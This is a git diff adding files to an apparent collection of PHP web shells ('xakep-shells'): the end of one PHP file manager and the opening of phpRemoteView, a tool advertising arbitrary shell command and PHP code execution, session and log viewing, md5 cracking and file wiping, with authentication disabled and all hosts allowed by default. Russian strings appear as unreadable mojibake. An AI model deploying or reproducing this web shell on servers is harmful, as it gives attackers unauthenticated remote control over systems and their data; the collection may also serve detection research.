+				echo(' ]');
+			} else {
+				if (dirname($file['readlink']) != '.') {
+					if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode(dirname($file['readlink'])) . "$p\">");
+					echo(htmlentities(dirname($file['readlink'])) . '/');
+					if ($file['is_readable']) echo('</a>');
+				}
+				if (strlen(basename($file['readlink'])) != 0) {
+					if ($file['is_file'] && $file['is_readable']) echo("<a href=\"$self?show=" . urlencode($file['readlink']) . "$p\">");
+					echo(htmlentities(basename($file['readlink'])));
+					if ($file['is_file'] && $file['is_readable']) echo('</a>');
+				}
+				if ($file['is_file'] && is_script($file['readlink'])) echo(" <a href=\"$self?showh=" . urlencode($file['readlink']) . "$p\">*</a>");
+			}
+			echo("</td>\n");
+		} elseif ($file['is_dir']) {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=15\" width=\"17\" height=\"13\"></td>\n");
+			echo("		<td$cspan bgcolor=\"#FFFFFF\">[ ");
+			if ($file['is_readable']) echo("<a href=\"$self?dir=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable']) echo('</a>');
+			echo(" ]</td>\n");
+		} else {
+			echo("		<td bgcolor=\"#FFFFFF\" align=\"center\"><img src=\"$self?imageid=");
+			if (substr($file['filename'], 0, 1) == '.') echo('13'); else echo('12');
+			echo("\" width=\"17\" height=\"13\"></td>\n");
+			echo('		<td');
+			if (substr($file['permission'], 0, 1) != '-') echo($cspan);
+			echo(' bgcolor="#FFFFFF">');
+			if ($file['is_readable'] && $file['is_file']) echo("<a href=\"$self?show=" . urlencode($file['fullfilename']) . "$p\">");
+			echo(htmlentities($file['filename']));
+			if ($file['is_readable'] && $file['is_file']) echo('</a>');
+			if ($file['is_file'] && is_script($file['filename'])) echo(" <a href=\"$self?showh=" . urlencode($file['fullfilename']) . "$p\">*</a>");
+			echo("</td>\n");
+			if ($GLOBALS['showsize'] && $file['is_file']) {
+				echo("		<td bgcolor=\"#FFFFFF\" align=\"right\" nowrap>");
+				if ($file['is_file']) echo("{$file['size']} B");
+				echo("</td>\n"); 
+			}
+		}
+		echo('		<td bgcolor="#FFFFFF" class="perm">');
+		if ($uid == $file['owner'] && !$file['is_link']) echo("<a href=\"$self?permission=" . urlencode($file['fullfilename']) . "$p\">");
+		echo($file['permission']);
+		if ($uid == $file['owner'] && !$file['is_link']) echo('</a>');
+		echo("</td>\n");
+		$owner = ($file['ownername'] == NULL) ? $file['owner'] : $file['ownername'];
+		$group = ($file['groupname'] == NULL) ? $file['group'] : $file['groupname'];
+		echo('		<td bgcolor="#FFFFFF">' . $owner . "</td>\n");
+		echo('		<td bgcolor="#FFFFFF">' . $group . "</td>\n");
+		$f = "<a href=\"$self?symlinktarget=" . urlencode($dir . $file['filename']). "$p\">{$words['createsymlink']}</a> | ";;
+		if ($file['filename'] != '.' && $file['filename'] != '..') {
+			if ($file['is_readable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?cpy=" . urlencode($file['fullfilename']). "$p\">{$words['copy']}</a> | ";
+			}
+			if ($uid == $file['owner']) {
+				$f .= "<a href=\"$self?move=" . urlencode($file['fullfilename']) . "$p\">{$words['move']}</a> | ";
+				$f .= "<a href=\"$self?delete=" . urlencode($dir . $file['filename']). "$p\">{$words['delete']}</a> | ";
+			}
+			if ($file['is_writable'] && $file['is_file']) {
+				$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . "$p\">{$words['edit']}</a> | ";
+			}
+		}
+		if ($file['is_dir'] && @is_file($file['fullfilename'] . '.htaccess') && @is_writable($file['fullfilename'] . '.htaccess')) {
+			$f .= "<a href=\"$self?edit=" . urlencode($file['fullfilename']) . '.htaccess' . "$p\">{$words['configure']}</a> | ";
+		}
+		if (!empty($f)) $f = substr($f, 0, strlen($f) - 3); else $f = '&nbsp;';
+		echo("		<td bgcolor=\"#FFFFFF\" nowrap>$f</td>\n");
+		echo("	</tr>\n");
+	}
+?>
+	</table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function sortfiles ($files, $sort, $reverse) {
+	$files = sortfield($files, $sort, $reverse, 0, sizeof($files) - 1);
+	if ($sort != 'filename') {
+		$old = $files[0][$sort]; $oldpos = 0;
+		for ($i = 1; $i < sizeof($files); $i++) {
+			if ($old != $files[$i][$sort]) {
+				if ($oldpos != ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+				$oldpos = $i;
+			}
+			$old = $files[$i][$sort];
+		}
+		if ($oldpos < ($i - 1)) $files = sortfield($files, 'filename', false, $oldpos, $i - 1);
+	}
+	return $files;
+}
+
+function octtostr ($mode) {
+	if     (($mode & 0xC000) === 0xC000) $type = 's'; /* Unix domain socket */
+	elseif (($mode & 0x4000) === 0x4000) $type = 'd'; /* Directory */
+	elseif (($mode & 0xA000) === 0xA000) $type = 'l'; /* Symbolic link */
+	elseif (($mode & 0x8000) === 0x8000) $type = '-'; /* Regular file */
+	elseif (($mode & 0x6000) === 0x6000) $type = 'b'; /* Block special file */
+	elseif (($mode & 0x2000) === 0x2000) $type = 'c'; /* Character special file */
+	elseif (($mode & 0x1000) === 0x1000) $type = 'p'; /* Named pipe */
+	else                                 $type = '?'; /* Unknown */
+	$owner  = ($mode & 00400) ? 'r' : '-';
+	$owner .= ($mode & 00200) ? 'w' : '-';
+	if ($mode & 0x800) $owner .= ($mode & 00100) ? 's' : 'S'; else $owner .= ($mode & 00100) ? 'x' : '-';
+	$group  = ($mode & 00040) ? 'r' : '-';
+	$group .= ($mode & 00020) ? 'w' : '-';
+	if ($mode & 0x400) $group .= ($mode & 00010) ? 's' : 'S'; else $group .= ($mode & 00010) ? 'x' : '-';
+	$other  = ($mode & 00004) ? 'r' : '-';
+	$other .= ($mode & 00002) ? 'w' : '-';
+	if ($mode & 0x200) $other .= ($mode & 00001) ? 't' : 'T'; else $other .= ($mode & 00001) ? 'x' : '-';
+	return $type . $owner . $group . $other;
+}
+
+function sortfield ($field, $column, $reverse, $left, $right){
+	$g = $field[(int) (($left + $right) / 2)][$column];
+	$l = $left; $r = $right;
+	while ($l <= $r) {
+		if ($reverse) {
+			while (($l < $right) && ($field[$l][$column] > $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] < $g)) $r--;
+		} else {
+			while (($l < $right) && ($field[$l][$column] < $g)) $l++;
+			while (($r > $left)  && ($field[$r][$column] > $g)) $r--;
+		}
+		if ($l < $r) {
+			$tmp = $field[$r];
+			$field[$r] = $field[$l];
+			$field[$l] = $tmp;
+			$r--;
+			$l++;
+		} else {
+			$l++;
+		}
+	}
+	if ($r > $left) $field = sortfield($field, $column, $reverse, $left, $r);
+	if ($r + 1 < $right) $field = sortfield($field, $column, $reverse, $r + 1, $right);
+	return $field;
+}
+
+function buildphrase ($repl, $str) {
+	if (!is_array($repl)) $repl = array($repl);
+	$newstr = ''; $prevz = ' ';
+	for ($i = 0; $i < strlen($str); $i++) {
+		$z = substr($str, $i, 1);
+		if (((int) $z) > 0 && ((int) $z) <= count($repl) && $prevz == ' ') $newstr .= $repl[((int) $z) - 1]; else $newstr .= $z;
+		$prevz = $z;
+	}
+	return $newstr;
+}
+
+function html_header ($action) {
+	global $self;
+	global $error, $notice, $updatetreeview;
+?>
+<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
+<html>
+<head>
+	<title><?php echo("$self - $action"); ?></title>
+	<style type="text/css">
+	<!--
+		td { font-family: sans-serif; font-size: 10pt; }
+		a:link, a:visited, a:active { text-decoration: none; color: #000088; }
+		a:hover { text-decoration: underline; color: #000088; }
+		.perm { font-family: monospace; font-size: 10pt; }
+	-->
+	</style>
+<?php
+	if (isset($_REQUEST['edit']) && !isset($_POST['save']) && basename($edit = $_REQUEST['edit']) == '.htaccess') {
+		$file = dirname($edit) . '/.htpasswd';
+?>
+	<script type="text/javascript" language="JavaScript">
+	<!--
+	function autheinf () {
+		document.f.content.value += "Authtype Basic\nAuthName \"Restricted Directory\"\n";
+		document.f.content.value += "AuthUserFile <?php echo(htmlentities($file)); ?>\n";
+		document.f.content.value += "Require valid-user";
+	}
+	//-->
+	</script>
+<?php
+	}
+?>
+</head>
+<body bgcolor="#FFFFFF"<?php if ($updatetreeview && !empty($_SESSION['tree'])) echo(" '$self?frame=treeview&dir=" . urlencode($_SESSION['dir']) . '&' . SID . '&pmru=' . time() . '#' . urlencode($_SESSION['dir']) . "'))\""); ?>>
+<?php
+	if (!empty($error)) perror($error);
+	if (!empty($notice)) pnotice($notice);
+	return;
+}
+
+function html_footer ($backbutton = TRUE) {
+	global $self, $words;
+	if ($backbutton) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#EEEEEE">
+	<a href="<?php echo("$self?id=". $_REQUEST['id']); ?>"><?php echo($words['back']); ?></a>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	}
+?>
+</body>
+</html>
+<?php
+	return;
+}
+
+function perror ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#FFCCCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+function pnotice ($str) {
+?>
+	<p>
+	<table border="0" cellspacing="0" cellpadding="0"><tr><td bgcolor="#888888">
+	<table border="0" cellspacing="1" cellpadding="4"><tr><td bgcolor="#CCFFCC">
+	<?php echo("$str\n"); ?>
+	</td></tr></table>
+	</td></tr></table>
+	</p>
+<?php
+	return;
+}
+
+?>
diff --git a/xakep-shells/PHP/Rem View.php.php.txt b/xakep-shells/PHP/Rem View.php.php.txt
new file mode 100644
index 0000000..4d6e436
--- /dev/null
+++ b/xakep-shells/PHP/Rem View.php.php.txt	
@@ -0,0 +1,2553 @@
+<?php
+
+/* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
+ *
+ *  Welcome to phpRemoteView (RemView) 
+ *
+ *  View/Edit remove file system:
+ *  - view index of directory (/var/log - view logs, /tmp - view PHP sessions)
+ *  - view name, size, owner:group, perms, modify time of files
+ *  - view html/txt/image/session files
+ *  - download any file and open on Notepad
+ *  - create/edit/delete file/dirs
+ *  - executing any shell commands and any PHP-code
+ *
+ *  Free download from http://php.spb.ru/remview/
+ *  Version 04c, 2003-10-23. 
+ *  Please, report bugs...
+ *
+ *  This programm for Unix/Windows system and PHP4 (or higest).
+ *
+ *  (c) Dmitry Borodin, dima@php.spb.ru, http://php.spb.ru
+ *
+ * * * * * * * * * * * * * * * * * WHATS NEW * * * * * * * * * * * * * * * *
+ *
+ * --version4--
+ *  2003.10.23 support short <?php ?> tags, thanks A.Voropay
+ *
+ *  2003.04.22 read first 64Kb of null-size file (example: /etc/zero), 
+ *                thanks Anight
+ *             add many functions/converts: md5, decode md5 (pass crack), 
+ *                date/time, base64, translit, russian charsets
+ *             fix bug: read session files
+ *
+ *  2002.08.24 new design and images
+ *             many colums in panel
+ *             sort & setup panel
+ *             dir tree
+ *             base64 encoding
+ *             character map
+ *             HTTP authentication with login/pass
+ *             IP-address authentication with allow hosts
+ *
+ * --version3--
+ *  2002.08.10 add multi language support (english and russian)
+ *             some update
+ *
+ *  2002.08.05 new: full windows support
+ *             fix some bugs, thanks Jeremy Flinston
+ * 
+ *  2002.07.31 add file upload for create files
+ *             add 'direcrory commands'
+ *             view full info after safe_mode errors
+ *             fixed problem with register_glogals=off in php.ini
+ *             fixed problem with magic quotes in php.ini (auto strip slashes)
+ *
+ * --version2--
+ *  2002.01.20 add panel 'TOOLS': eval php-code and run shell commands
+ *             add panel 'TOOLS': eval php-code and run shell commands
+ *             add copy/edit/create file (+panel 'EDIT')
+ *             add only-read mode (disable write/delete and PHP/Shell)
+ *
+ *  2002.01.19 add delete/touch/clean/wipe file
+ *             add panel 'INFO', view a/c/m-time, hexdump view
+ *             add session file view mode (link 'SESSION').
+ *
+ *  2002.01.12 first version!
+ *
+ * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * */
+
+///////////////////////////////// S E T U P ///////////////////////////////////
+
+   
+   $version="2003-10-23";
+
+   $hexdump_lines=8;        // lines in hex preview file
+   $hexdump_rows=24;        // 16, 24 or 32 bytes in one line
+
+   $mkdir_mode=0755;        // chmode for new dir ('MkDir' button)
+
+   $maxsize_fread=65536;    // read first 64Kb from any null-size file
+
+   // USER ACCESS //
+
+   $write_access=true;      // true - user (you) may be write/delete files/dirs
+                            // false - only read access
+
+   $phpeval_access=true;    // true - user (you) may be execute any php-code
+                            // false - function eval() disable
+   
+   $system_access=true;     // true - user (you) may be run shell commands
+                            // false - function system() disable
+   
+   // AUTHORIZATION //
+
+   $login=false;            // Login & password for access to this programm.
+   $pass=false;             // Example: $login="MyLogin"; $pass="MyPaSsWoRd";
+                            // Type 'login=false' for disable authorization.
+
+   $host_allow=array("*");  // Type list of your(allow) hosts. All other - denied.
+                            // Example: $host_allow=array("127.0.0.*","localhost")
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+   $tmp=array();
+   foreach ($host_allow as $k=>$v)
+      $tmp[]=str_replace("\\*",".*",preg_quote($v));
+   $s="!^(".implode("|",$tmp).")$!i";
+   if (!preg_match($s,getenv("REMOTE_ADDR")) && !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) 
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - your host not allow</h1>\n");
+   if ($login!==false && (!isset($HTTP_SERVER_VARS['PHP_AUTH_USER']) || 
+      $HTTP_SERVER_VARS['PHP_AUTH_USER']!=$login || $HTTP_SERVER_VARS['PHP_AUTH_PW']!=$pass)) {
+      header("WWW-Authenticate: Basic realm=\"phpRemoteView\"");
+      header("HTTP/1.0 401 Unauthorized");
+      exit("<h1><a href=http://php.spb.ru/remview/>phpRemoteView</a>: Access Denied - password erroneous</h1>\n");
+   }
+
+   error_reporting(2047);
+   set_magic_quotes_runtime(0);
+   @set_time_limit(0);
+   @ini_set('max_execution_time',0);
+   @ini_set('output_buffering',0);
+   if (function_exists("ob_start") && (!isset($c) || $c!="md5crack")) ob_start("ob_gzhandler");
+
+   $self=basename($HTTP_SERVER_VARS['PHP_SELF']);
+
+   $url="http://".getenv('HTTP_HOST').
+        (getenv('SERVER_PORT')!=80 ? ":".getenv('SERVER_PORT') : "").
+        $HTTP_SERVER_VARS['PHP_SELF'].
+        (getenv('QUERY_STRING')!="" ? "?".getenv('QUERY_STRING') : "");
+   $uurl=urlencode($url);
+
+   //
+   // antofix 'register globals': $HTTP_GET/POST_VARS -> normal vars;
+   //
+   $autovars1="c d f php skipphp pre nlbr xmp htmls shell skipshell pos ".
+              "ftype fnot c2 confirm text df df2 df3 df4 ref from to ".
+              "fatt showfile showsize root name ref names sort sortby ".
+              "datetime fontname fontname2 fontsize pan limit convert fulltime fullqty";
+   foreach (explode(" ",$autovars1) as $k=>$v)  {
+      if (isset($HTTP_POST_VARS[$v])) $$v=$HTTP_POST_VARS[$v];
+         elseif (isset($HTTP_GET_VARS[$v])) $$v=$HTTP_GET_VARS[$v];
+            //elseif (isset($HTTP_COOKIE_VARS[$v])) $$v=$HTTP_COOKIE_VARS[$v];
+   }
+
+   //
+   // autofix 'magic quotes':
+   //
+   $autovars2="php shell text d root convert";
+   if (get_magic_quotes_runtime() || get_magic_quotes_gpc()) {
+      foreach (explode(" ",$autovars2) as $k=>$v) {
+         if (isset($$v)) $$v=stripslashes($$v);
+      }
+   }
+
+   $cp_def=array(
+      "001001",
+      "nst2ac",
+      "d/m/y H:i",
+      "Tahoma",
+      "9"
+      );
+
+   $panel=0;
+   if (isset($HTTP_COOKIE_VARS["cp$panel"])) 
+      $cp=explode("~",$HTTP_COOKIE_VARS["cp$panel"]); 
+   else 
+      $cp=$cp_def;
+   $cc=$cp[0];
+   $cn=$cp[1];
+
+/*
+
+$cc / $cp[0]- ������ ������������� ����������, ����������� � $cs:
+   $cc[0] - �� ����� ������� �����������, � ���� ��� �� �����:
+               n - �� �����
+               e - ����������
+   $cc[1] - ������� (0 - �������. 1 - ���������)
+   $cc[2] - ���������� �� ������
+   $cc[3] - ��� ������ ��� ����� �� ������ �����:
+               0 - �������� � text/plain
+               1 - �������� � html
+               2 - download
+               3 - ��������� ����� (info)
+   $cc[4] - ��������� ������ ������ �� ��/��/��
+   $cc[5] - ����:
+               1 - ����������
+               2 - ������
+
+$cn / $cp[1] - ������ ������� � �� �������, ������� ����������, ������ ����/����:
+   t - type
+   n - name
+   s - size
+   a - owner+group
+   o - owner
+   g - group
+   c - chmod
+   1 - create time
+   2 - modify time
+   3 - access time
+
+$cp[2]: ������ �������
+
+$cp[3]: ��� ������
+
+$cp[4]: ������ ������
+
+*/
+
+   // ��� ����������� �������
+   $cn_align=array();
+   $cn_align['t']='center';
+   $cn_align['n']='left';
+   $cn_align['s']='right';
+   $cn_align['a']='center';
+   $cn_align['o']='center';
+   $cn_align['g']='center';
+   $cn_align['c']='center';
+   $cn_align['1']='center';
+   $cn_align['2']='center';
+   $cn_align['3']='center';
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+/*--mmstart--*/
+$mm=array(
+"Index of"=>"������",
+"View file"=>"����� �����",
+"DISK"=>"����",
+"Info"=>"����",
+"Plain"=>"������",
+"HTML"=>"HTML",
+"Session"=>"������",
+"Image"=>"��������",
+"Notepad"=>"�������",
+"DOWNLOAD"=>"���������",
+"Edit"=>"������",
+"Sorry, this programm run in read-only mode."=>"��������, ��� ��������� �������� � ������ '������ ������'.",
+"For full access: write"=>"��� ������� �������: ��������",
+"in this php-file"=>"� ���� php-�����",
+"Reason"=>"�������",
+"Error path"=>"��������� ����",
+"Click here for start"=>"������� ��� ������",
+"up directory"=>"������� ����",
+"access denied"=>"������ ��������",
+"REMVIEW TOOLS"=>"������� REMVIEW",
+"version"=>"������",
+"Free download"=>"���������� ��������",
+"back to directory"=>"��������� � �������",
+"Size"=>"������",
+"Owner"=>"�����",
+"Group"=>"������",
+"FileType"=>"��� �����",
+"Perms"=>"�����",
+"Create time"=>"����� ��������",
+"Access time"=>"����� �������",
+"MODIFY time"=>"����� ���������",
+"HEXDUMP PREVIEW"=>"������������ � 16-������ ����",
+"ONLY READ ACCESS"=>"������ ������ �� ������",
+"Can't READ file - access denied"=>"�� ���� ��������� - ������ ��������",
+"full read/write access"=>"������ ������ �� ������/������",
+"FILE SYSTEM COMMANDS"=>"������� �������� �������",
+"EDIT"=>"������.",
+"FILE"=>"����",
+"DELETE"=>"�������",
+"Delete this file"=>"������� ����",
+"CLEAN"=>"��������",
+"TOUCH"=>"��������",
+"Set current 'mtime'"=>"�����.�����.�����",
+"WIPE(delete)"=>"����������",
+"Write '0000..' and delete"=>"������ ������, �������",
+"COPY FILE"=>"���������� ����",
+"COPY"=>"����������",
+"MAKE DIR"=>"������� �������",
+"type full path"=>"������� ������ ����",
+"MkDir"=>"����.���.",
+"CREATE NEW FILE or override old file"=>"������� ����� ���� ��� ������������ ������",
+"CREATE/OVERRIDE"=>"�������/������������",
+"select file on your local computer"=>"������� ���� �� ����� ��������� ����������",
+"save this file on path"=>"��������� ���� ���� � �������",
+"create file name automatic"=>"��������� ��� ����� �������������",
+"OR"=>"���",
+"type any file name"=>"������ ��� ����� �������",
+"convert file name to lovercase"=>"�������������� ��� � ������ �������",
+"Send File"=>"������� ����",
+"Delete all files in dir"=>"������� ��� �����",
+"Delete all dir/files recursive"=>"������� ��� +����������� ����������",
+"Confirm not found (go back and set checkbox)"=>"������������� �� ���������� (��������� ����� � ��������� �������)",
+"Delete cancel - File not found"=>"�������� �������� - ���� �� ������",
+"YES"=>"��",
+"ME"=>"����",
+"NO (back)"=>"��� (�����)",
+"Delete cancel"=>"�������� ��������",
+"ACCESS DENIED"=>"������ ��������",
+"done (go back)"=>"������ (�����)",
+"Delete ok"=>"��, ��������",
+"Touch cancel"=>"���������� ��������",
+"Touch ok (set current time to 'modify time')"=>"���������� ��������� (����� ��������� ������� ����� �����������)",
+"Clean (empty file) cancel"=>"�������� (��������� �����) ��������",
+"Clean ok (file now empty)"=>"��, ������� (���� �������)",
+"Wipe cancel - access denied"=>"����������� �������� - ������ ��������",
+"Wipe ok (file deleted)"=>"��, ���������� (� ���� �����)",
+"DIR"=>"DIR",
+"Deleting all files in"=>"�������� ���� ������ �",
+"skip"=>"�������",
+"deleting"=>"��������",
+"Deleting all dir/files (recursive) in"=>"�������� ���� ������/������������ (����������)",
+"DONE, go back"=>"������, �����",
+"DONE"=>"������",
+"file not found"=>"���� �� ������",
+"ONLY READ ACCESS (don't edit!)"=>"������ ������ �� ������ (�� �������������)",
+"Can't READ file - access denied (don't edit!)"=>"�� ���� ������ ���� - ������ ��������",
+"EDIT FILE"=>"������� ����",
+"can't open, access denied"=>"�� ���� �������, ������ ��������",
+"SAVE FILE (write to disk)"=>"��������� ���� (������ �� ����)",
+"You mast checked 'create file name automatic' OR typed file name!"=>"�� ������ �������� ������� [������� ���� �������������] ��� ������ � ���� ��� �����!'",
+"SAVING TO"=>"��������� �",
+"Sorry, access denied"=>"��������, ������ ��������",
+"for example, uncomment next line"=>"��� �������, ���������������� ��������� ������",
+"Eval PHP code"=>"��������� PHP ���",
+"don't type"=>"�� ������",
+"and"=>"�",
+"example (remove comments '#')"=>"������ (������� ����������� '#')",
+"Shell commands"=>"������� Shell'a",
+"filesize to 0byte"=>"������ � 0 ����",
+"from"=>"��",
+"to"=>"�",
+"Full file name"=>"������ ��� �����",
+"Can't open directory"=>"�� ���� ������� �������",
+"setup"=>"���������",
+"back"=>"�����",
+"Reset all settings"=>"�������� ��� ���������",
+"clear"=>"��������",
+"Current"=>"�������",
+"Colums and sort"=>"������� � ����������",
+"Sort order"=>"������� ����������",
+"Ascending sort"=>"�� �����������",
+"Descending sort"=>"�� ��������",
+"Sort by filename"=>"����������� �� ����� �����",
+"Sort by filename extension"=>"����������� �� ���������� �����",
+"Date/time format"=>"������ ����/�������",
+"Panel font & size"=>"�����/������ ������",
+"Setup"=>"�����",
+"Char map"=>"�������",
+"Language"=>"����",
+"English"=>"����������",
+"Russian"=>"�������",
+"Character map (symbol codes table)"=>"������� ��������",
+"Select font"=>"�������� �����",
+"or type other"=>"��� ������� ������",
+"Font size"=>"������ ������",
+"Code limit"=>"������� �����",
+"Generate table"=>"������������� �������",
+"Universal convert"=>"������������� �����������"
+);/*--mmstop--*/
+
+
+
+
+   $language=$cc[5];
+   if ($language!=1 && $language!=2) $language=1;
+
+
+function mm($m) {
+   global $mm,$language;
+   if ($language==1) return $m;
+   if (isset($mm[$m])) return $mm[$m];
+   else echo "<script>alert('(mm) msg not found: $m');</script>";
+}
+
+
+switch ($language) {
+case 1:
+$cn_name=array(
+'t'=>"Type",
+'n'=>"Name",
+'s'=>"Size",
+'o'=>"Owner",
+'g'=>"Group",
+'a'=>"Owner/Group",
+'c'=>"Perms",
+'1'=>"Create",
+'2'=>"Modify",
+'3'=>"Access"
+);
+break;
+case 2:
+$cn_name=array(
+'t'=>"���",
+'n'=>"���",
+'s'=>"������",
+'o'=>"��������",
+'g'=>"������",
+'a'=>"��������/������",
+'c'=>"�����",
+'1'=>"������",
+'2'=>"�������",
+'3'=>"������"
+);
+break;
+}
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+
+   $rand=microtime();
+
+   if (!isset($c)) $c="";
+   if (!isset($d)) $d="";
+   if (!isset($f)) $f="";
+
+   ob();
+   $d=str_replace("\\","/",$d);
+   if ($d=="") $d=realpath("./")."/";
+   if ($c=="") $c="l";
+   if ($d[strlen($d)-1]!="/") $d.="/";
+   $d=str_replace("\\","/",$d);
+   if (!is_dir($d)) obb().die("<h3><P>".mm("Can't open directory")." <tt><font color=red><big>$d</big></font></tt>$obb");
+   if (!realpath($d) || filetype($d)!="dir") obb().die("error dir type $obb");
+   obb();
+
+   //
+   // OS detect:
+   //
+   $win=0;
+   $unix=0;
+   if (strlen($d)>1 && $d[1]==":") $win=1; else $unix=1;
+
+
+
+
+///////////////////////////////////////////////////////////////////////////////
+
+
+$html=<<<remview
+<html><head>
+<title>phpRemoteView: $d$f</title>
+</head>
+<body>
+<style>
+A {
+text-decoration : none;
+}
+.t {
+font-size: 9pt;
+text-align : center;
+font-family: Verdana;
+}
+.t2 {
+font-size: 8pt;
+text-align : center;
+font-family: Verdana;
+}
+.n {
+  font-family: Fixedsys
+}
+.s {
+font-size: 10pt;
+text-align : right;
+font-family: Verdana;
+}
+.sy {
+font-family: Fixedsys;
+}
+.s2 {
+font-family: Fixedsys;
+color: red;
+}
+.tab {
+font-size: 10pt;
+text-align : center;
+font-family: Verdana;
+background: #cccccc;
+}
+.tr {
+background: #ffffff;
+}
+</style>
+remview;
+
+
+
+function display_perms($mode) 
+{ 
+if ($GLOBALS['win']) return 0;
+/* Determine Type */ 
+if( $mode & 0x1000 ) 
+$type='p'; /* FIFO pipe */ 
+else if( $mode & 0x2000 ) 
+$type='c'; /* Character special */ 
+else if( $mode & 0x4000 ) 
+$type='d'; /* Directory */ 
+else if( $mode & 0x6000 ) 
+$type='b'; /* Block special */ 
+else if( $mode & 0x8000 ) 
+$type='-'; /* Regular */ 
+else if( $mode & 0xA000 ) 
+$type='l'; /* Symbolic Link */ 
+else if( $mode & 0xC000 ) 
+$type='s'; /* Socket */ 
+else 
+$type='u'; /* UNKNOWN */ 
+
+/* Determine permissions */ 
+$owner["read"] = ($mode & 00400) ? 'r' : '-'; 
+$owner["write"] = ($mode & 00200) ? 'w' : '-'; 
+$owner["execute"] = ($mode & 00100) ? 'x' : '-'; 
+$group["read"] = ($mode & 00040) ? 'r' : '-'; 
+$group["write"] = ($mode & 00020) ? 'w' : '-'; 
+$group["execute"] = ($mode & 00010) ? 'x' : '-'; 
+$world["read"] = ($mode & 00004) ? 'r' : '-'; 
+$world["write"] = ($mode & 00002) ? 'w' : '-'; 
+$world["execute"] = ($mode & 00001) ? 'x' : '-'; 
+
+/* Adjust for SUID, SGID and sticky bit */ 
+if( $mode & 0x800 ) 
+$owner["execute"] = ($owner['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x400 ) 
+$group["execute"] = ($group['execute']=='x') ? 's' : 'S'; 
+if( $mode & 0x200 ) 
+$world["execute"] = ($world['execute']=='x') ? 't' : 'T'; 
+
+$s=sprintf("%1s", $type); 
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']); 
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']); 
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']); 
+return trim($s);
+} 
+
+function _posix_getpwuid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getpwuid($x);
+}
+
+function _posix_getgrgid($x) {
+   if ($GLOBALS['win']) return array();
+   return @posix_getgrgid($x);
+}
+
+function up($d,$f="",$name="") {
+   global $self,$win;
+
+   $len=strlen($d."/".$f);
+   if ($len<70) { $sf1="<font size=4>"; $sf2="<font size=5>"; }
+   elseif ($len<90) {$sf1="<font size=3>"; $sf2="<font size=4>";}
+   else {$sf1="<font size=2>"; $sf2="<font size=3>";}
+
+   echo "<table width=100% border=0 cellspacing=0 cellpadding=4><tr><td 
+   bgcolor=#cccccc> $sf1";
+
+   $home="<a href='$self'><font face=fixedsys size=+2>*</font></a>";
+   echo $home.$sf2."<b>";
+   if ($name!="") echo $name;
+   else {
+      if ($f=="") echo mm("Index of"); 
+      else echo mm("View file");
+   }
+   echo "</b></font> ";
+   
+   $path=explode("/",$d);
+
+   $rootdir="/";
+   if ($win) $rootdir=strtoupper(substr($d,0,2))."/";
+
+   $ss="";
+   for ($i=0; $i<count($path)-1; $i++) {
+      if ($i==0) 
+         $comm="<b>&nbsp;&nbsp;<big><b>$rootdir</b></big></b>"; 
+      else 
+         $comm="$path[$i]<big><b>/</big></b>";
+    
+      $ss.=$path[$i]."/";
+      echo "<a href='$self?c=l&d=".urlencode($ss)."'>$comm</a>";
+      if ($i==0 && $d=="/") break;
+   }
+   echo "</font>";
+   if ($f!="") echo "$sf1$f</font>";
+
+   if ($win && strlen($d)<4 && $f=="") {
+      echo " &nbsp; ".mm("DISK").": ";
+      for ($i=ord('a'); $i<=ord('z'); $i++) {
+         echo "<a href=$self?c=l&d=".chr($i).":/>".strtoupper(chr($i)).":</a> ";
+      }   
+   }
+
+   echo "</b></big></td><td bgcolor=#999999 width=1% align=center>
+   <table width=100% border=0 cellspacing=3 cellpadding=0 
+   bgcolor=#ffffcc><tr><td align=center><font size=-1><nobr><b><a 
+   href=$self?c=t&d=".urlencode($d).">".mm("REMVIEW TOOLS")."</a></b>
+   </nobr></font></td></tr></table>
+   </td></tr></table>";
+}
+
+
+function up_link($d,$f) {
+   global $self;
+   $notepad=str_replace(".","_",$f).".txt";
+echo "<small>
+[<a href=$self?c=i&d=".urlencode($d)."&f=".urlencode($f)."><b>".mm("Info")."</b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=><b>".mm("Plain")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=0&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1><b>".mm("HTML")."<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=1&fnot=1>(+)</a></b></a>]
+[<a href=$self?c=v&d=".urlencode($d)."&f=".urlencode($f)."&ftype=4><b>".mm("Session")."</b></a>]
